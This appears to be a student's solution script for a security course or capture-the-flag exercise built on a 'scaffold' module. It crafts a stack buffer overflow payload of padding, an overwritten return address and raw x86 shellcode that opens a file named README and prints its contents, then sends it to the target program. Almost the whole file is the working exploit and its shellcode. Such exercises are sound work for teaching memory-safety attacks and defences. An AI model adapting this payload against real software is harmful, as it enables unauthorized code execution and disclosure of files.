#!/usr/bin/env python3

import scaffold as p
from scaffold import SHELLCODE
import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### YOUR CODE STARTS HERE ###

# The encoding='latin1' argument here is pretty important, so don't remove it!
# with open('hack', 'w', encoding='latin1') as f:
#     f.write('Hello world!\n')

f = open('hack', 'w', encoding='latin1')
f.write("")

p.start()

assert p.recv(30) == 'How many bytes should I read? '

p.send('236\n')

SHELLCODE = \
    '\x31\xc0\x31\xdb\x31\xc9\x31\xd2' \
    '\xeb\x32\x5b\xb0\x05\x31\xc9\xcd' \
    '\x80\x89\xc6\xeb\x06\xb0\x01\x31' \
    '\xdb\xcd\x80\x89\xf3\xb0\x03\x83' \
    '\xec\x01\x8d\x0c\x24\xb2\x01\xcd' \
    '\x80\x31\xdb\x39\xc3\x74\xe6\xb0' \
    '\x04\xb3\x02\xb2\x01\xcd\x80\x83' \
    '\xc4\x01\xeb\xdf\xe8\xc9\xff\xff' \
    '\xffREADME\x00'

garbage = 'a' * 148 # 128B (buf) + 16B (padding) + 4B (SFP read_file)
shellcode_addr = '\x80\xdc\xff\xff'

payload = garbage + shellcode_addr  + SHELLCODE + '\n'
f.write(payload)
f.flush()
f.close()

print(p.recv(12))
### YOUR CODE ENDS HERE ###
